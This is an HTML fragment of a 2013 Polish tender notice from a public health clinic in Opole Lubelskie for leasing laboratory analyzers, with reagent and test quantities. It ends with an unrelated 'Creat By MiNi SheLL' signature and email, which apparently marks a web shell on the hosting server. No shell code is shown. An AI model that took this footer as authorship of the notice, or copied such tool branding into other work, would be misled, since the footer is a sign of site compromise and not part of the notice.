<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.spzozopolelubelskie.pl/index.php?option=com_docman&task=cat_view&gid=287&Itemid=115<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 24-300 Opole Lubelskie, ul. Przemysłowa 4a, pok. nr 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.03.2013 godzina 13:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej, 24-300 Opole Lubelskie, ul. Przemysłowa 4a, Sekretariat - pok.nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zadanie nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I
Analizatory testów immunochemicznych  kod CPV 38434580-5 -dzierżawa automatycznych wieloparametrowych analizatorów immunodiagnostycznych szt.1 na okres 24 miesięcy wraz z dostawą odczynników na określoną w SIWZ ilość badań oraz koniecznych materiałów eksploatacyjnych, kalibratorów i materiałów kontrolnych do wykonania n/w ilości badań
Aparat spełniający wymogi wg. ZAŁĄCZNIKA 1 LAB
Lp
Nazwa badania
Ilość






1
TROPONINA
2184






2
D-Dimer
700






3
hs CRP
3200






4
Koszt dzierżawy sprzętu  miesięcznie - dzierżawa na okres 24 miesięcy
24







Należy podać zestawienie: ilość odczynników, wycena wraz z ilością koniecznych materiałów eksploatacyjnych, kalibratorów i materiałów kontrolnych do wykonania wymaganej ilości badań

























II
Analizatory hematologiczne - kod CPV 38434570-2 -  dzierżawa aparatu hematologicznego szt. 1 wraz z odczynnikami i akcesoriami potrzebnymi do pracy aparatu - dzierżawa na okres 24 miesięcy wraz z odczynnikami, krwią kontrolną /3 poziomy/ do codziennej kontroli jakości badań
Aparat spełniający wymogi wg. ZAŁĄCZNIKA 2 LAB
Lp
Nazwa badania
Ilość






1
Koszt jednego badania wraz z akcesoriami, odczynnikami i materiałami kontrolnymi
24000






2
Koszt dzierżawy sprzętu  miesięcznie - dzierżawa na okres 24 miesięcy
24







Należy podać zestawienie: ilość odczynników, wycena wraz z ilością koniecznych materiałów eksploatacyjnych, kalibratorów i materiałów kontrolnych do wykonania wymaganej ilości badań


































III.
Analizatory biochemiczne - kod  CPV 38434500-1 -  dzierżawa aparatu biochemicznego szt. 1 wraz z odczynnikami, kalibratorami, materiałami kontrolnymi i akcesoriami potrzebnymi do wykonania podanej ilości badań i  codziennej kontroli jakości badań których koszt jest wliczony w cenę badania - dzierżawa na okres 24 miesięcy.

Aparat spełniający wymogi wg. ZAŁĄCZNIKA 3 LAB











nazwa
j.m.
ilość





1
białko całkowite
badanie
900





2
bilirubina całkowita
badanie
2400





3
cholesterol całkowity
badanie
12000





4
cholesterol HDL
badanie
7200





5
glukoza
badanie
24000





6
kreatynina met. kinetyczna bez odbiałczania
badanie
14400





7
kwas moczowy
badanie
1200





8
mocznik
badanie
13800





9
trójglicerydy
badanie
12000





10
aminotransferaza alaninowa
badanie
6000





11
aminotransferaza asparaginowa
badanie
6000





12
amylaza
badanie
2000





13
fosfataza alkaliczna
badanie
1000





14
CKMB
badanie
400





15
wapń całkowity
badanie
720





16
żelazo
badanie
1680





1
koszt dzierżawy sprzętu  miesięcznie - dzierżawa na okres 24 miesięcy
miesiące
24






Należy podać zestawienie: ilość odczynników, wycena wraz z ilością koniecznych materiałów eksploatacyjnych, kalibratorów i materiałów kontrolnych do wykonania wymaganej ilości badań


































IV
Analizator do elektrolitów  -  dzierżawa aparatu do elektrolitów szt. 1 wraz z odczynnikami, materiałami kontrolnymi i akcesoriami potrzebnymi do wykonania n/w ilości testów  - dzierżawa na okres 24 miesięcy
Aparat spełniający wymogi wg. ZAŁĄCZNIKA 4 LAB
Lp
Nazwa badania - elektrolity Na, K, Cl
Ilość testów






1
Elektrolity ( Na, K, Cl )
16800






2
koszt dzierżawy sprzętu  miesięcznie - dzierżawa na okres 24 miesięcy
24







Należy podać zestawienie: ilość odczynników, wycena wraz z ilością koniecznych materiałów eksploatacyjnych, kalibratorów i materiałów kontrolnych do wykonania wymaganej ilości badań

























V
Analizator do moczu  -  dzierżawa analizatorów szt. 1 wraz z materiałami do wykonania n/w ilości badań i codziennej kontroli jakości badań /paski, paski kontrolne/ - dzierżawa na okres 24 miesięcy
Aparat spełniający wymogi wg. ZAŁĄCZNIKA 5 LAB.









Lp
Nazwa badania
Ilość testów






1
Koszt jednego oznaczenia (analiza moczu
18000






2
koszt dzierżawy sprzętu  miesięcznie - dzierżawa na okres 24 miesięcy
24
























VI
Koagulometr półautomatyczny  -  dzierżawa koagulometrów szt. 1 wraz z odczynnikami, kalibratorami, kontrolami i materiałami potrzebnymi do wykonania n/w ilości testów i codziennej kontroli jakości badań - dzierżawa na okres 24 miesięcy
Aparat spełniający wymogi wg. ZAŁĄCZNIKA 6 LAB.









Lp
Nazwa badania
Ilość testów






1
PT
13000






2
APTT
3600






3
koszt dzierżawy sprzętu  miesięcznie - dzierżawa na okres 24 miesięcy
24.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.40.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 2 

I
 Paskowy, przenośny analizator parametrów krytycznych szt.1 (pomiar: Troponiny, CK-MB, Myoglobiny, D-dimer i NT-proBNP) 
na okres 24 miesięcy wraz z dostawą odczynników na określoną w SIWZ ilość badań oraz koniecznych materiałów eksploatacyjnych, kalibratorów i materiałów kontrolnych do wykonania n/w ilości badań

Lp
Nazwa badania
Ilość






1
TROPONINA
936






2
D-Dimer
300






3
CK-MB
500






4
Myoglobina
500






5
NT-proBNP
500






4
Koszt dzierżawy sprzętu  miesięcznie - dzierżawa na okres 24 miesięcy
24







Należy podać zestawienie: ilość odczynników, wycena wraz z ilością koniecznych materiałów eksploatacyjnych, kalibratorów i materiałów kontrolnych do wykonania wymaganej ilości badań.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.40.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com